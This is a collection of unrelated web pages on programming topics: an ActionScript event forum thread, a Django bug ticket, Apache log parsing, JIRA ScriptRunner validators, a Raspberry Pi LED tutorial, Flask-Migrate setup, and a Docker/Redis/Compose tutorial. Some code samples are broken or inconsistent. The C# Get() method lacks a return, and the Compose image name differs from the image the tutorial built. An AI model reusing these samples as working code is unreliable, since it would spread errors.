I couldn't reopen it. It wouldn't let me. I didn't mean to make this private, either.

Support Staff 3 Posted by Shaun Smith on 11 Mar, 2010 12:04 PM

Oh no! Perhaps closing issues is a bad idea then - I assumed that anyone could re-open any issue by simply continuing the conversation. Will have to look into that. This thread is now public - not sure what's going on there either! Sorry for any hassles.

4 Posted by stevensacks on 12 Mar, 2010 01:15 AM

I made it public. The mystery is solved. ;)

Stray closed this discussion on 10 Feb, 2011 05:03 PM.
http://robotlegs.tenderapp.com/discussions/problems/45-extend-mediators-for-roland
Opened 6 years ago. Closed 6 years ago.

#19895 closed Bug (fixed): Second iteration over an invalid queryset returns an empty list instead of an exception

Description

As a part of #17664 it was discovered that an invalid queryset only raises exceptions during the first iteration. When iterating over the queryset again, an empty list is returned, i.e. the following test case would fail:

    def test_invalid_qs_list(self):
        qs = Article.objects.order_by('invalid_column')
        self.assertRaises(FieldError, list, qs)
        self.assertRaises(FieldError, list, qs)

Attachments (3) Change History (19)

comment:1 Changed 6 years ago by
comment:2 Changed 6 years ago by
comment:3 Changed 6 years ago by
comment:4 Changed 6 years ago by As suggested by jacobkm on IRC, here's the updated patch:
comment:5 Changed 6 years ago by

comment:6 Changed 6 years ago by That commit is causing a serious ORM memory leak in one of my applications. It may be that my code is not the cleanest, but anyway, I consider this a serious regression.

comment:7 Changed 6 years ago by Attached is a minimalistic test case that will show the memory leak. The case is simple - have enough objects that one ITERATOR_CHUNK_SIZE will not convert all the objects (that is, more than 100 objects in the queryset). Do bool(qs). This will result in a memory leak when this ticket's patch is applied, but will not leak if this ticket's patch isn't applied. The reason for the leak is a bug in Python itself. The gc.garbage docs say that:

    "A list of objects which the collector found to be unreachable but could not be freed (uncollectable objects). By default, this list contains only objects with __del__() methods. Objects that have __del__() methods and are part of a reference cycle cause the entire reference cycle to be uncollectable, including objects not necessarily in the cycle but reachable only from it. ..."

However, no __del__ method is defined anywhere, so there should not be any uncollectable objects.
Also, PyPy collects the garbage, so this is another thing pointing to a bug in Python. I have tested this with Python 2.7.3 and Python 3.2.3, and both of those will leak. PyPy 1.8.0 collects the garbage correctly. Steps to reproduce: unpack the attachment, run tester.py, see if gc.garbage has a reference to _safe_iterator. Even if this is a bug in Python, this has to be fixed in Django itself. The memory leak can be bad. It seems just reverting the commit is the right fix. Interestingly enough, doing this change in Query.iterator() is enough to cause the leak:

    try:
        iterator() code here...
    except Exception:
        raise

comment:8 Changed 6 years ago by Here is a minimalistic case showing the bug in Python:

    class MyObj(object):
        def __iter__(self):
            self._iter = iter(self.iterator())
            return iter(self._iter)

        def iterator(self):
            try:
                while True:
                    yield 1
            except Exception:
                raise

    i = next(iter(MyObj()))
    import gc
    gc.collect()
    print(gc.garbage)

comment:9 Changed 6 years ago by I filed a bug in the Python bug tracker. Does anybody see any other solution than reverting the patch?

comment:10 Changed 6 years ago by I think we should roll back the patch. Your queryset-iteration simplification patch will fix this bug anyway, correct?

comment:11 Changed 6 years ago by The more complex version of the simplification patch has this same issue. It is likely possible to work around this issue in the patch. As for 1.5, a rollback seems like the only option.

comment:12 Changed 6 years ago by
comment:13 Changed 6 years ago by
comment:14 Changed 6 years ago by

comment:15 Changed 6 years ago by This isn't a release blocker any more; the leak is fixed, and the second iteration works in the same way as before.

comment:16 Changed 6 years ago by Test committed in 904084611d740e26eb3cb44af9a3d2f3a6d1b665. All the solutions I can come up with are apparently ugly. I'm attaching two versions of the patch for discussion (with tests stripped).
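For what it's worth, the uncollectable-cycle behaviour reported above was later addressed in CPython itself (3.4's PEP 442 made objects with finalizers in reference cycles collectable). On a current interpreter, a reconstruction of the minimal case no longer leaves anything in gc.garbage -- a quick check on our part, not something stated in the ticket:

```python
import gc

class MyObj(object):
    def __iter__(self):
        # self._iter holds the generator, and the generator's frame holds
        # self (it comes from a bound method), so this is a reference cycle.
        self._iter = iter(self.iterator())
        return iter(self._iter)

    def iterator(self):
        try:
            while True:
                yield 1
        except Exception:
            raise

next(iter(MyObj()))
gc.collect()
assert gc.garbage == []  # the cycle is collected on CPython 3.4+
```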
One solution is wrapping the iterator in another method, the other is putting the required try/catch in the iterator() method itself, which pushes the indentation to six levels deep maximum.
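To make the desired contract concrete (a toy stand-in, not Django's actual implementation): whichever fix is chosen, iteration must re-run evaluation each time instead of handing back a cached, already-consumed iterator, so a broken queryset raises on every pass rather than returning [] on the second one:

```python
class BrokenQuerySet:
    """Hypothetical stand-in for a queryset whose SQL compilation fails."""

    def _evaluate(self):
        # In Django this would be a FieldError raised during compilation.
        raise ValueError("cannot resolve 'invalid_column'")
        yield  # unreachable; just makes this method a generator

    def __iter__(self):
        # Re-evaluate on every iteration; never cache the failed iterator.
        return self._evaluate()

qs = BrokenQuerySet()
for _ in range(2):
    try:
        list(qs)
        raised = False
    except ValueError:
        raised = True
    assert raised, "second iteration must raise too, not return []"
```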
https://code.djangoproject.com/ticket/19895
I have apache logs that look like the following. How do I process this?

    10.10.6.49 - - [26/Jan/2017:17:15:25 -0800] "POST /thrift/service/MyApiService/ HTTP/1.1" 200 4605 "" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36"

Hi Dale, this is a good question! You would do this by writing an Import UDF. We have several examples of Import UDFs that you can search for on this discussion group. But let me take a stab at this. Here is example UDF code for this in Python:

    import json
    import io
    import apache_log_parser

    def parseAccessLog(fullPath, inStream):
        line_parser = apache_log_parser.make_parser("%h %l %u %t \"%r\" %>s %O \"%{Referer}i\" \"%{User-Agent}i\"")
        for line in inStream.readlines():
            try:
                logData = line_parser(line)
            except:
                # we recommend you do some processing here and generate an ICV row instead
                continue
            yield logData

Notice the use of yield above. Yield is a Python feature: it returns a generator which can be used by the consumer of the UDF, which in this case is the Xcalar Compute Environment (XCE). Each line maps to a dictionary instance that is then handed back through the generator via yield. If you need to test your UDF with a main driver, make sure you use a stream generator. Here is example code for this:

    inStream = io.open("access_log")
    gen = parseAccessLog("", inStream)
    for record in gen:
        print "Printing record..."
        for fieldName, fieldValue in record.iteritems():
            print "field {}: value {}".format(fieldName, fieldValue)

Once you write your UDF, you can test it using Xcalar Design (XD). Use the Point to Data Source feature and make sure your browser points to the dataset which needs to be streamed. Choose the JSON format for conversion. Once you have this UDF tested in a command-line shell, you can paste it into the UDF editor in Xcalar and upload it. Using the Import Data Source you can perform the import. Hope this helps!
Cheers, Manoj

To add to Manoj's great reply, I'd like to highlight how Xcalar Design 1.3.1 streamlines the workflow for creating an Import UDF in Jupyter Notebook for a custom-format data source file, like the semi-structured apache access_log @dschaefer wanted to parse. Here are the steps you'd take today: rather than using Python through a command-line shell to debug and manually copying your UDF into place, the new process shepherds you into Jupyter and back into the process of creating a table from your data source file. Try it out, and give us your feedback.

Best wishes, Mark
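If you'd rather avoid the third-party apache_log_parser dependency in the UDF above, the same combined-format line can be split with a standard-library regex. This is just a sketch with field names of our own choosing, not an official Xcalar or Apache API:

```python
import re

# One named capture group per field of the combined log format in the question.
LOG_RE = re.compile(
    r'(?P<host>\S+) (?P<ident>\S+) (?P<user>\S+) '
    r'\[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) '
    r'"(?P<referer>[^"]*)" "(?P<agent>[^"]*)"'
)

def parse_access_line(line):
    """Return a dict of fields, or None if the line doesn't match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None

sample = ('10.10.6.49 - - [26/Jan/2017:17:15:25 -0800] '
          '"POST /thrift/service/MyApiService/ HTTP/1.1" 200 4605 "" '
          '"Mozilla/5.0 (X11; Linux x86_64)"')
rec = parse_access_line(sample)
# rec["status"] -> "200"
# rec["request"] -> "POST /thrift/service/MyApiService/ HTTP/1.1"
```

Inside a streaming UDF you would then yield parse_access_line(line) for each line, skipping (or flagging as an invalid row) any line that returns None.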
https://discourse.xcalar.com/t/white-check-mark-how-do-i-process-semi-structured-apache-access-log/359
I have been using Behaviours to make fields required on certain projects without altering the Field Configurations (which are used across many projects). It works great (create a behaviour, map it to a particular project, and set the field to required). However, I can't figure out how to do this for just one transition screen in a project. Is it possible to set a field to required for only 1 screen in a project? I know that I can do this by adding a validator to the workflow, but I don't want to change the workflow either, as it too is used by many projects.

Hi Morgan, you can use getFieldScreen(), in your behaviour, in order to determine which screen you are in.

Hey Thanos - thanks. I just realised you may have given me this answer before! The problem is I don't know how to use getFieldScreen() to do this. If it's a simple thing, could you tell me what code I can enter in? For example, if I have created a behaviour, as described above, that makes a field required for a particular project, is it just a case of clicking 'Add Serverside Script' in that behaviour and typing in 'getFieldScreen(NAMEofSCREEN)' and that's it? Sorry for not being very code-savvy. Cheers, Morgan

Hey Morgan. So, you can associate screens with issue operations; then getFieldScreen(), with no params, will return to you the name of the screen, let's say Bug Screen, and from the moment that you get the name of the screen you can add some logic to it (string comparisons). A 'lazy' way is to add some debugging -- log.debug("Name of the screen " + getFieldScreen()) -- and check the names of the screens you are in. Hope that helps.

Hi Thanos, I appreciate your help but I think you have over-estimated my coding skills. I'm not a coder - I administer Project Management tools here at Demonware.
I understand associating screens with issue operations, as that is part of JIRA's functionality. As to adding logic and string comparisons, I'm afraid I don't know about that. It would be extremely useful for me to have some code that I can add to behaviours (by clicking 'Add server-side script' I guess?) which would limit the behaviour to a named screen. Essentially what I was hoping for was some code which I can paste into 'Add Server-side script' which effectively says 'Only apply this behaviour to screen X'. To my mind the actual behaviour itself then wouldn't require any scripting, as I can do that by adding the field and setting it to 'required' and mapping it to a project (as I've been doing until now). Or does adding a script over-ride all of that? I'm also not sure if what you've mentioned above should be entered in as a script, or into the 'Class or File:' and 'Method' fields. Nor do I know what I would enter into the 'Class or File:' field if that were the case. As you can see, I don't know much. Morgan

Plan B, if you want to use server-side validation or the screen you use is not unique, as you already presumed, is to associate a validator with the specific transition, or use the SR simple scripted validator.

Hi again! I am familiar with validators - unfortunately I can't make changes to the workflow for this project, as the workflow is shared with other projects where the field I want to make mandatory should not be mandatory.

As Thanos said...

    if (fieldScreen.name == "Resolve Issue") {
        ... // do whatever behaviour you want
    }

Thanks Jamie. It seems that I may have to go and learn Groovy, specifically for using with ScriptRunner and JIRA. Do you have any recommendation as to where a beginner with little coding experience should start?

Hi... in my experience, just pick a task and go for it. But previously there have been several questions about which resources to use, eg and the SR docs.
If you use a scripted validator, you can include the project you want to validate as part of the condition; that way other projects can use the same workflow without the field requirement impacting them. Something very basic such as:

    issue.getProjectObject().getKey() != "MYPROJECT" || cfValues['Some Custom Field'] != null

Thank you Jeremy - this was just the sort of thing I was hoping for. Unfortunately, when I tried putting this code in as a 'Custom Script Validator' (with the project key in place of "MYPROJECT" and the custom field name in place of "Some Custom Field") I get the error: The variable 'cfValues' is undeclared. Any idea why that would be?

Not offhand, I copied that part straight out of the examples for simple scripted validators. However, I don't use those much; here is a 'regular' scripted validator that should work:

    import com.atlassian.jira.issue.Issue;
    import com.atlassian.jira.ComponentManager;
    import com.atlassian.jira.issue.CustomFieldManager;
    import com.atlassian.jira.issue.fields.CustomField;
    import com.atlassian.jira.project.version.Version;
    import com.opensymphony.workflow.InvalidInputException;

    ComponentManager componentManager = ComponentManager.getInstance();
    CustomFieldManager customFieldManager = componentManager.getCustomFieldManager();

    if (issue.getProjectObject().getKey() == "MYPROJECT") {
        CustomField mcf = customFieldManager.getCustomFieldObjectByName("My Custom Field");
        Version mcfv = issue.getCustomFieldValue(mcf);
        Boolean hasCF = (mcfv != null);
        if (!hasCF) {
            invalidInputException = new InvalidInputException("\"My Custom Field\" is required for this transition.");
        }
    }

Thanks again Jeremy - this gives me: ...the variable 'componentManager' is undeclared and ...cannot find matching method com.atlassian.jira.issue.fields.Customfield#isEmpty(). Please check if the declared type is right and if the method exists. I realise this isn't a forum for debugging code. Just thought I'd say what I got for anyone else viewing this.
Cheers, Morgan

My bad, I removed ComponentManager from my sample without paying close attention to what it was used for. I've edited the previous comment to fix that.

Well, that took care of the first error, but I'm still getting: ...cannot find matching method com.atlassian.jira.issue.fields.Customfield#isEmpty(). Please check if the declared type is right and if the method exists. Sigh.

Sorry, I went too fast there and forgot to fetch the custom field value from the issue when I made the code generic. What type of custom field is it, a basic string?

Hey - it's a 'Version Picker (single version)' type field in this case. The name of the custom field is 'Version Introduced'.

Okay, try that; I've only ever worked with the multi-version type that returns a list, but hopefully this one will return a single Version, or "null" if not set.

Well, now for the line - Version mcfv = issue.getCustomFieldValue(mcf); - I'm getting: Cannot assign value of type java.lang.Object to variable of type com.atlassian.jira.project.version.Version. Sorry! And thank you for your help!

Try changing "Version mcfv = ..." to "def mcfv = ...". Just out of curiosity, how are you debugging this? Are the exceptions showing up in logs and you are mapping them back to the source lines?

That gives me a similar error. I'm just looking at the errors that show up in the custom script validator entry field. See (this site won't let me attach images for some reason).
https://community.atlassian.com/t5/Jira-Core-questions/How-can-I-use-an-Adaptavist-Behaviour-to-make-a-field-required/qaq-p/348162
Building a Raspberry Pi LED Flasher

In this simple electronics project, you get to build a simple breadboard circuit that connects an LED to a Raspberry Pi via the GPIO port on pin 3 of the header. The figure shows the completed project. In this project, you connect an external LED to a Raspberry Pi, and then use a simple sketch to turn the LED on and off at 0.5-second intervals.

Parts needed to build an LED flasher

- One Raspberry Pi 2 or 3 with Raspbian installed, connected to a monitor, keyboard, and power
- One small solderless breadboard (RadioShack 2760003)
- One 5mm red LED (RadioShack 2760209)
- One 330 Ω resistor (orange-orange-brown)
- Two jumper wires (M/F)

Steps for building an LED flasher

- Insert resistor R1. R1 – 330 Ω: A3 to ground bus
- Insert LED1. Cathode (short lead): D3; Anode (long lead): D5
- Connect the ground bus to the Raspberry Pi header pin 6 (ground). Use a jumper to connect any hole in the ground bus on the breadboard.
- Connect pin 3 on the Raspberry Pi to A5 on the breadboard.
- Open the Python 2 IDLE Editor with root privileges.
- Create and save the sketch shown here, using the filename LedBlink.

    import RPi.GPIO as GPIO
    import time

    GPIO.setmode(GPIO.BOARD)
    GPIO.setup(3, GPIO.OUT)
    while True:
        GPIO.output(3, GPIO.HIGH)
        time.sleep(0.5)
        GPIO.output(3, GPIO.LOW)
        time.sleep(0.5)

- Run the LedBlink program by choosing Run → Run Module (or press F5).

The LED on the breadboard will flash on and off at half-second intervals.
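If you want to check the control flow before sitting down at the Pi, the blink logic above can be exercised without hardware. The sketch below is a hedged stand-in: FakeGPIO is a made-up substitute for the RPi.GPIO module (which only exists on the Pi), and the pin number and timing mirror the LedBlink sketch.

```python
# Hardware-free sketch of the same blink logic; FakeGPIO is invented here
# purely so the control flow can run (and be tested) on any machine.
class FakeGPIO:
    BOARD, OUT, HIGH, LOW = "BOARD", "OUT", 1, 0

    def __init__(self):
        self.log = []          # records every call made against the "pins"

    def setmode(self, mode):
        self.log.append(("setmode", mode))

    def setup(self, pin, direction):
        self.log.append(("setup", pin, direction))

    def output(self, pin, level):
        self.log.append(("output", pin, level))


def blink(gpio, pin=3, cycles=2, sleep=lambda s: None):
    """Same structure as LedBlink, but with a bounded loop and injectable sleep."""
    gpio.setmode(gpio.BOARD)
    gpio.setup(pin, gpio.OUT)
    for _ in range(cycles):
        gpio.output(pin, gpio.HIGH)
        sleep(0.5)
        gpio.output(pin, gpio.LOW)
        sleep(0.5)


gpio = FakeGPIO()
blink(gpio)
print(gpio.log[:2])  # [('setmode', 'BOARD'), ('setup', 3, 'OUT')]
```

On the Pi itself you would pass the real RPi.GPIO module in place of FakeGPIO and use time.sleep for the sleep argument.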
https://www.dummies.com/computers/raspberry-pi/building-raspberry-pi-led-flasher/
what is the best way to listen for key events

Hi All

I hope someone can help. I am creating an Adobe AIR for Android app and I have a problem. I need to navigate through the app using the hardware key on the phone, which dispatches a keyCode of Keyboard.BACK. This is how I have wired everything up. In the app context I have added a listener to the stage, see below:

    contextView.stage.addEventListener(KeyboardEvent.KEY_DOWN, dispatchEvent);
    commandMap.mapEvent(KeyboardEvent.KEY_DOWN, BackCommand, KeyboardEvent);

This listens for a key event then calls the BackCommand which takes action. The back command looks like the below:

    public class BackCommand extends Command
    {
        [Inject]
        public var appModel:AppModel;

        [Inject]
        public var evt:KeyboardEvent;

        public override function execute():void
        {
            evt.preventDefault();
            evt.stopImmediatePropagation();

            // make sure we have a section to go back to
            appModel.currHistoryPos--;
            if (appModel.currHistoryPos < 0) {
                // reset the var; if we don't it will error
                appModel.currHistoryPos = -1;
            }
            //trace("key registered.... " + evt, "curr back num is: " + appModel.currHistoryPos);
            if (evt.keyCode == Keyboard.BACK) {
                if (appModel.currHistoryPos >= 0) {
                    if (exitSection(appModel.currSection) == true) {
                        // if we have reached the top of the app sections (library, browse or create), exit the app
                        appModel.nextSection = Sections.EXIT;
                        dispatch(new AppEvent(AppEvent.SECTION_CHANGE));
                    } else {
                        // only if the hardware back key has been pressed do this
                        trace("//================ key registered.... " + appModel.currHistoryPos);
                        // tells the app we are using its buttons to navigate.
                        // This is used for the history memory so when back is pressed we can go back to the previous section
                        appModel.navType = "back";
                        // grab the new section, set it to be the next section to see, then dispatch an event to the app to jump to that section
                        var backSection:String = appModel.backMemory[appModel.currHistoryPos];
                        appModel.nextSection = backSection;
                        dispatch(new AppEvent(AppEvent.SECTION_CHANGE));
                    }
                }
            }
        }
    }

The problem I am having is that back seems to exit the app, which it should not do. It should just move to the previous view. So I was wondering, am I setting up the keyboard event right? If you could guide me with an example that would be great.

regards
Mike :)

Comments are currently closed for this discussion. You can start a new one.

1 Posted by Michal Wroblews... on 27 Jul, 2011 08:36 PM

You should use evt.preventDefault() to prevent the app from closing at the Back button, and you're using it. Please try to do the same without any command mapping for a check. Just addEventListener and in the handler method use preventDefault(); remove evt.stopImmediatePropagation(); by the way. And what is contextView.stage.addEventListener(KeyboardEvent.KEY_DOWN, dispatchEvent); doing? Maybe the dispatchEvent handler stops immediate propagation?

2 Posted by Mike oscar on 27 Jul, 2011 08:52 PM

Hi Michal

I have tried it without the command and it works, but my implementation above does not work. So this leads me to believe that I need to do this differently, as I think the preventDefault() is not working the way it is. Is there a different way to do the above so the event is passed directly to the function? Any code will help.

Regards mike :)

3 Posted by Michal Wroblews... on 28 Jul, 2011 10:37 AM

Looks like not the same instance of the event is passed to the command, or something else causes the problem. Do it this way: 1. Leave the listener without the command. It will prevent the default behavior.
Don't use stopImmediatePropagation(). 2. Use your own logic as you described in your command. You don't have to preventDefault here. Please debug your application and place breakpoints in both the command and the key listener. Check if the events are the same instances (compare memory pointers).

Thanks Mike

4 Posted by Stray on 28 Jul, 2011 10:44 AM

The clone() will mean that the events are unlikely to be the same instances.

5 Posted by Michal Wroblews... on 28 Jul, 2011 10:45 AM

When are events cloned?

6 Posted by Shawn on 29 Jul, 2011 09:46 PM

Why would RL clone the event? Can't it just pass along the original reference to the command?

7 Posted by Michal Wroblews... on 29 Jul, 2011 09:57 PM

Shawn, no idea. I'm using SignalCommandMap and if I need to pass an event I just pass it there :) So I haven't faced the problem. Thanks for letting us know. Probably it should be filed as a bug.

Mike

Support Staff 8 Posted by Robert Penner on 14 Sep, 2011 07:25 PM

If you redispatch an Event, EventDispatcher automatically clones it, because the Event's target and currentTarget properties could be different.

Ondina D.F. closed this discussion on 21 Nov, 2011 09:09 AM.
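Robert Penner's last point is the key to the whole thread, and it can be demonstrated without Flash at all. The following is a hedged, minimal stand-in written here for illustration (none of these classes are the real Flash or Robotlegs APIs): a dispatcher that clones on redispatch, so the preventDefault() called inside the command lands on the clone and never cancels the original Back event.

```javascript
// Toy model of Flash-style event redispatch. Invented names, not the real API.
class Evt {
  constructor(type) { this.type = type; this.defaultPrevented = false; }
  clone() { return new Evt(this.type); }
  preventDefault() { this.defaultPrevented = true; }
}

class Dispatcher {
  constructor() { this.listeners = []; }
  addEventListener(fn) { this.listeners.push(fn); }
  // Redispatching an event that originated elsewhere clones it first,
  // as Flash's EventDispatcher does when target/currentTarget would differ.
  redispatch(evt) {
    const clone = evt.clone();
    this.listeners.forEach(fn => fn(clone));
    return clone;
  }
}

const framework = new Dispatcher();
const original = new Evt("keyDown");   // stands in for the hardware Back event
let delivered;
framework.addEventListener(e => { delivered = e; e.preventDefault(); });
framework.redispatch(original);

console.log(delivered === original);      // false - the command saw a clone
console.log(original.defaultPrevented);   // false - too late to cancel Back
```

This is why calling preventDefault() directly in the stage listener works, while calling it inside the mapped command does not.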
http://robotlegs.tenderapp.com/discussions/problems/354-what-is-the-best-way-to-listen-for-key-events
Implementing Database Migrations to Badgeyay

The Badgeyay project is divided into two parts, i.e. a front-end in Ember JS and a back-end with a REST API programmed in Python. We have integrated PostgreSQL as the object-relational database in Badgeyay, and we are using the SQLAlchemy SQL toolkit and Object Relational Mapper to work with the database from Python. As we use the Flask microframework for Python, we have Flask-SQLAlchemy as a Flask extension that adds support for SQLAlchemy and its ORM. One of the challenging jobs is to manage the changes we make to the models and propagate these changes to the database. For this purpose, I have added migrations to Flask-SQLAlchemy for handling database changes using the Flask-Migrate extension. In this blog, I will be discussing how I added migrations to Flask-SQLAlchemy for handling database changes using the Flask-Migrate extension in my Pull Request.

First, let's understand database models, migrations, and the Flask-Migrate extension. Then we will move on to adding migrations using Flask-Migrate. Let's get started and understand it step by step.

What are Database Models?

A database model defines the logical design and structure of a database, which includes the relationships and constraints that determine how data can be stored and accessed. Presently, we have User and File models in the project.

What are Migrations?

Database migration is a process that usually includes assessment and database schema conversion. Migrations enable us to manage the modifications we make to the models and propagate these changes to the database. For example, if later on we make a change to a field in one of the models, all we will need to do is create and run a migration, and the database will replicate the change.

What is Flask-Migrate?

Flask-Migrate is an extension that handles SQLAlchemy database migrations for Flask applications using Alembic.
The database operations are made available through the Flask command-line interface or through the Flask-Script extension. Now let's add support for migrations in Badgeyay.

Step 1: Install Flask-Migrate.

    pip install flask-migrate

Step 2: We will need to edit run.py so that it looks like this:

    import os

    from flask import Flask
    from flask_migrate import Migrate  # imported Flask-Migrate

    from api.db import db
    from api.config import config

    ......

    db.init_app(app)
    migrate = Migrate(app, db)  # allows us to run migrations

    ......

    @app.before_first_request
    def create_tables():
        db.create_all()

    if __name__ == '__main__':
        app.run()

Step 3: Create the migration directory.

    export FLASK_APP=run.py
    flask db init

This will create the migration directory in the backend API folder:

    └── migrations
        ├── README
        ├── alembic.ini
        ├── env.py
        ├── script.py.mako
        └── versions

Step 4: We will create our first migration with the following command.

    flask db migrate

Step 5: We will apply the migration with the following command.

    flask db upgrade

Now we are all done with setting up migrations to Flask-SQLAlchemy for handling database changes in the Badgeyay repository. We can verify the migration by checking the tables in the database. This is how I added migrations to Flask-SQLAlchemy for handling database changes using the Flask-Migrate extension in my Pull Request.

Resources:
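Under the hood, flask db upgrade just runs the schema-change statements that Alembic generated from the model diff. As a hedged illustration of what such a migration ultimately does, here is a stdlib-only sketch using sqlite3; the user table and email column are made up for this example and are not Badgeyay's actual schema.

```python
# Stdlib-only sketch: the ALTER TABLE a typical autogenerated Alembic
# migration would run when a new column is added to a model.
import sqlite3

conn = sqlite3.connect(":memory:")

# Schema as it exists before the model change (illustrative names).
conn.execute("CREATE TABLE user (id INTEGER PRIMARY KEY, username TEXT)")


def upgrade(conn):
    # Body of a typical autogenerated migration's upgrade() step after
    # an 'email' field is added to the model.
    conn.execute("ALTER TABLE user ADD COLUMN email TEXT")


upgrade(conn)

# Verify the migration the same way you would inspect the real database.
cols = [row[1] for row in conn.execute("PRAGMA table_info(user)")]
print(cols)  # ['id', 'username', 'email']
```

The real migration scripts live under migrations/versions/ and also carry a downgrade() step to reverse the change.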
https://blog.fossasia.org/tag/flask-migrate/
In the previous post we have learned how to build a multi-container application. On top of the website we built in the second post of the series, we have added a Web API, which is leveraged by the web application to display the list of posts published on this blog. The two applications have been deployed in two different containers but, thanks to the bridge network offered by Docker, we've been able to put them in communication. In this post we're going to see two additional steps:

- We're going to add a new service to the solution. In all the previous posts we have built custom images, since we needed to run inside a container an application we have built. This time, instead, we're going to use a service as it is: Redis.
- We're going to see how we can easily deploy our multi-container application. The approach we've seen in the previous post (using the docker run command on each container) isn't very practical in the real world, where all the containers must be deployed simultaneously and you may have hundreds of them.

Let's start!

Adding a Redis cache to our application

Redis is one of the most popular caching solutions on the market. At its core, it's a document-oriented database which can store key-value pairs. It's used to improve the performance and reliability of applications, thanks to its main features:

- It's an in-memory database, which makes all the writing and reading operations much faster compared to a traditional database which persists the data to disk.
- It supports replication.
- It supports clustering.

We're going to use it in our Web API to store the content of the RSS feed. This time, if the RSS feed has already been downloaded, we won't download it again but will retrieve it from the Redis cache. As a first step, we need to host Redis inside a container. The main difference compared to what we have done in the previous posts is that Redis is a service, not a framework or a platform.
Our web application will use it as it is; we don't need to build an application on top of it like we did with the .NET Core image. This means that we don't need to build a custom image, but can just use the official one provided by the Redis team. We can use the standard docker run command to initialize our container:

    docker run --rm --network my-net --name rediscache -d redis

As usual, the first time we execute this command Docker will pull the image from Docker Hub. Notice how, also in this case (like we did for the Web API in the previous post), we aren't exposing the service on the host machine through a port. The reason is that the Redis cache will be leveraged only by the Web API, so we need it to be accessible only from the other containers. We have also set the name of the container (rediscache) and we have connected it to the bridge called my-net, which we have created in the previous post. Feel free to run the docker ps command to check that everything is up & running:

    PS C:\Users\mpagani\Source\Samples\NetCoreApi\WebSample> docker ps
    CONTAINER ID   IMAGE   COMMAND                  CREATED         STATUS         PORTS      NAMES
    1475ccd3ec0a   redis   "docker-entrypoint.s…"   4 seconds ago   Up 2 seconds   6379/tcp   rediscache

Now we can start tweaking our Web API to use the Redis cache. Open with Visual Studio Code the Web API project we have previously built and move to the NewsController.cs file. The easiest way to leverage a Redis cache in a .NET Core application is using a NuGet package called StackExchange.Redis.
To add it to your project open the terminal and run:

    dotnet add package StackExchange.Redis

Once the package has been installed, we can start changing the code of the GetAsync() method declared in the NewsController class in the following way:

    [HttpGet]
    public async Task<ActionResult<IEnumerable<string>>> Get()
    {
        ConnectionMultiplexer connection = await ConnectionMultiplexer.ConnectAsync("rediscache");
        var db = connection.GetDatabase();

        List<string> news = new List<string>();
        string rss = string.Empty;

        rss = await db.StringGetAsync("feedRss");
        if (string.IsNullOrEmpty(rss))
        {
            HttpClient client = new HttpClient();
            rss = await client.GetStringAsync("");
            await db.StringSetAsync("feedRss", rss);
        }
        else
        {
            news.Add("The RSS has been returned from the Redis cache");
        }
    }

In order to let this code compile, you will need to add the following namespace at the top of the class:

    using StackExchange.Redis;

In the first line we're using the ConnectionMultiplexer class to connect to the instance of the Redis cache we have created. Since we have connected the container to a custom network, we can reference it using its name rediscache, which will be resolved by the internal DNS, as we have learned in the previous post. Then we get a reference to the database by calling the GetDatabase() method. Once we have a database, using it is really simple, since it offers a set of get and set methods for the various data types supported by Redis. In our scenario we need to store the RSS feed, which is a string, so we use the StringGetAsync() and StringSetAsync() methods. At first, we try to retrieve from the cache a value identified by the key feedRss. If it's null, it means that the cache is empty, so we need to download the RSS first. Once we have downloaded it, we store it in the cache with the same key. Just for testing purposes, in case the RSS is coming from the cache and not from the web, we add an extra item in the returned list.
This way, it will be easier for us to determine if our caching implementation is working. Now that we have finished our work, we can build an updated image as usual, by right clicking on the Dockerfile in Visual Studio Code and choosing Build Image, or by running the following command:

    docker build -t qmatteoq/testwebapi .

We don't need, instead, to change the code of the web application. The Redis cache will be completely transparent to it. We are ready to run our containers again. Also in this case, we're going to connect them to the same bridge as the Redis cache and we're going to assign a fixed name:

    docker run --rm -p 8080:80 --name webapp --network my-net -d qmatteoq/testwebapp
    docker run --rm --name newsfeed --network my-net -d qmatteoq/testwebapi

The first command launches the container with the website (thus, the 80 port is exposed to the 8080 port on the machine), while the second one launches the Web API (which doesn't need to be exposed to the host, since it will be consumed only by the web application). Now open your browser and point it to http://localhost:8080. The first time it should take a few seconds to start, because we're performing the request against the online RSS feed. You should see, in the main page, just the list of posts from this blog:

Now refresh the page. This time the operation should be much faster and, as the first post of the list, you should see the test item we have added in code when the feed is retrieved from the Redis cache:

Congratulations! You have added a new service to your multi-container application!

Deploy your application

If you think about using Docker containers in production or with a really complex application, you can easily understand all the limitations of the approach we have used so far. When you deploy an application, you need all the containers to start as soon as possible. Manually launching docker run for each of them isn't a practical solution. Let's introduce Docker Compose!
It's another command line tool, included in Docker for Windows, which can be used to compose multi-container applications. Thanks to a YAML file, you can describe the various services you need to run to boot your application. Then, using a simple command, Docker is able to automatically run or stop all the required containers. In this second part of the post we're going to use Docker Compose to automatically start all the containers required by our application: the web app, the Web API and the Redis cache. The first step is to create a new file called docker-compose.yml inside a folder. It doesn't have to be a folder which contains a specific project; it can be any folder, since Docker Compose works with existing images that you should have already built. Let's see the content of our YAML file:

    version: '3'
    services:
      web:
        image: qmatteoq/testwebapp
        ports:
          - "8080:80"
        container_name: webapp
      newsfeed:
        image: qmatteoq/webapitest
        container_name: newsfeed
      redis:
        image: redis
        container_name: rediscache

As you can see, the various commands are pretty easy to understand. version is used to set the Docker Compose file version we want to use. In this case, we're using the latest one. Then we create a section called services, which specifies each service we need to run for our multi-container application. For each service, we can specify different parameters, based on the configuration we want to achieve. The relevant ones we use are:

- image, to define which image we want to use for this container
- ports, to define which ports we want to expose to the host. It's the equivalent of the -p parameter of the docker run command
- container_name, to define which name we want to assign to the container. It's the equivalent of the --name parameter of the docker run command.
Once we have built our Docker Compose file, we can run it by opening a terminal in the same folder and launching the following command:

    PS C:\Users\mpagani\Source\Samples\NetCoreApi> docker-compose -f "docker-compose.yml" up -d --build
    Creating network "netcoreapi_default" with the default driver
    Creating newsfeed ... done
    Creating webapp ... done
    Creating rediscache ... done

Did you see what just happened? Docker Compose has automatically created a new network bridge called netcoreapi_default for us and it has attached all the containers to it. If, in fact, you execute the docker network ls command, you will find this new bridge in the list:

    7d245b95b7c4        netcoreapi_default        bridge        local
    a29b7408ba22        none                      null          local

